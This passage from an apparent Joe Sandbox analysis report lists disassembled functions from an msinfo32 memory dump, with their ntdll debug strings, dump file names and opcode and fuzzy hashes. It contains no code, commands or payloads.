                                                                                                        • Instruction ID: 1109fcf6d7eb2a6aa7acab426d9317652054b8fe001ad150059664022c738bb9
                                                                                                        • Opcode Fuzzy Hash: b357d5c267d28ddff5877a875956177a93e939d816cc543588d581ba96b12afc
                                                                                                        • Instruction Fuzzy Hash: 2651B7B5A00116BFDF11EF9888909BEF7B8BB48204754916DE5ADD7641E234FE508BE0
                                                                                                        Function 04E77630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • ExecuteOptions, xrefs: 04EB46A0
                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 04EB4787
                                                                                                        • Execute=1, xrefs: 04EB4713
                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04EB4655
                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04EB46FC
                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04EB4742
                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04EB4725
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                        • API String ID: 0-484625025
                                                                                                        • Opcode ID: 3b9296e581b27ade63773c871ceb63254fce66aff757f13c25f137e776d8b02a
                                                                                                        • Instruction ID: 79a1966f57d79eb8266eed9f0de6be4c3f49b603af99cdb8ffb513d8fc9c1d31
                                                                                                        • Opcode Fuzzy Hash: 3b9296e581b27ade63773c871ceb63254fce66aff757f13c25f137e776d8b02a
                                                                                                        • Instruction Fuzzy Hash: 75510831600219BAEF14ABA4ED85FEA73A9EF04319F0418E9D509A71C1E771BE41CF50
                                                                                                        Function 04E8B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-$0$0
                                                                                                        • API String ID: 1302938615-699404926
                                                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                        • Instruction ID: d84b1a3d4909668135c0cc43ff4bb63efe55686eecbb4f970c98217f4e61e618
                                                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                        • Instruction Fuzzy Hash: FA81D030E452499EDF24AF68C8907FEBBB2AF45314F18661DF86DA7290D735B8408B50
                                                                                                        Function 04E6F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04EB02E7
                                                                                                        • RTL: Re-Waiting, xrefs: 04EB031E
                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04EB02BD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                        • API String ID: 0-2474120054
                                                                                                        • Opcode ID: 05e61052316f1309bd3b1b51020fef2d0a22cfcdef9b79705970395344fed500
                                                                                                        • Instruction ID: 8bd88ff4651a7f14ee9dca74c1e02693a11e0f0146c1326af18f2dab73f6ea00
                                                                                                        • Opcode Fuzzy Hash: 05e61052316f1309bd3b1b51020fef2d0a22cfcdef9b79705970395344fed500
                                                                                                        • Instruction Fuzzy Hash: A7E1BF306447419FD724CF28D884B6BB7E0BF88358F142A5DE5A68B2E1E774F945CB82
                                                                                                        Function 04E7BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04EB7B7F
                                                                                                        • RTL: Re-Waiting, xrefs: 04EB7BAC
                                                                                                        • RTL: Resource at %p, xrefs: 04EB7B8E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 0-871070163
                                                                                                        • Opcode ID: 79e44c936e4272bea0213c6e00fe37af16778c83584c30e308917f575be340a5
                                                                                                        • Instruction ID: 71f9e7ecdf8f5051d4837b6093343ffd5be479832aca2e3ac1d1e3b011422ba4
                                                                                                        • Opcode Fuzzy Hash: 79e44c936e4272bea0213c6e00fe37af16778c83584c30e308917f575be340a5
                                                                                                        • Instruction Fuzzy Hash: B141BF313047029FD728DE258D40B6AB7E6EF88B28F001A1DE89ADB680DB31F5058B91
                                                                                                        Function 04E7B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04EB728C
                                                                                                        Strings
                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04EB7294
                                                                                                        • RTL: Re-Waiting, xrefs: 04EB72C1
                                                                                                        • RTL: Resource at %p, xrefs: 04EB72A3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 885266447-605551621
                                                                                                        • Opcode ID: 13effc7c950c6454ee763e44dbb07f2c377d8b969778dce0f5f7503275cdbf0c
                                                                                                        • Instruction ID: 3e527172758be96c3dcda5d683e6ed67d739031c42fc60825731a535047b81cd
                                                                                                        • Opcode Fuzzy Hash: 13effc7c950c6454ee763e44dbb07f2c377d8b969778dce0f5f7503275cdbf0c
                                                                                                        • Instruction Fuzzy Hash: B241E271740206AFDB24DF25CC41BA6B7A5FF84728F142619F995EB680EB31F8428BD1
                                                                                                        Function 04E87D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-
                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                        • Instruction ID: d9159b14bd9ea775ad1b75cad05b73ef17e997fe92cc40a36177212e5058180e
                                                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                        • Instruction Fuzzy Hash: 6E919271E002159AEF24FF6ACC806BEB7A5BF45368F64651EE85DA72C1E730A940C720
                                                                                                        Function 04E49126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $$@
                                                                                                        • API String ID: 0-1194432280
                                                                                                        • Opcode ID: b4ded90a1fa312a5f3f115ead46b24fd1b9f97d8b66d0f243fe804ebd6b1b9a7
                                                                                                        • Instruction ID: 6e96856febf769eb1894904532a06e8e63a0e497283286a7062b439ee9bab5e2
                                                                                                        • Opcode Fuzzy Hash: b4ded90a1fa312a5f3f115ead46b24fd1b9f97d8b66d0f243fe804ebd6b1b9a7
                                                                                                        • Instruction Fuzzy Hash: BA812DB1D002699BDB35DF54DC44BEEB7B4AB48754F0452EAAA09B7240E7706E84CFA0
                                                                                                        Function 04ECCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 04ECCFBD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_4e10000_msinfo32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CallFilterFunc@8
                                                                                                        • String ID: @$@4Qw@4Qw
                                                                                                        • API String ID: 4062629308-2383119779
                                                                                                        • Opcode ID: 67797ebca15b4abb7a3e0f4b5c769404b233b3fffc22c44c2c4e012420ca2a31
                                                                                                        • Instruction ID: e5ec358f3ac83810ac80530b389c0c91c72c65d521febb6c8a4543d5157c3c35
                                                                                                        • Opcode Fuzzy Hash: 67797ebca15b4abb7a3e0f4b5c769404b233b3fffc22c44c2c4e012420ca2a31
                                                                                                        • Instruction Fuzzy Hash: A2419F71900258DFEB21DFA9D940AAEBBB9FF44708F10502EED15DB264E735E802CB65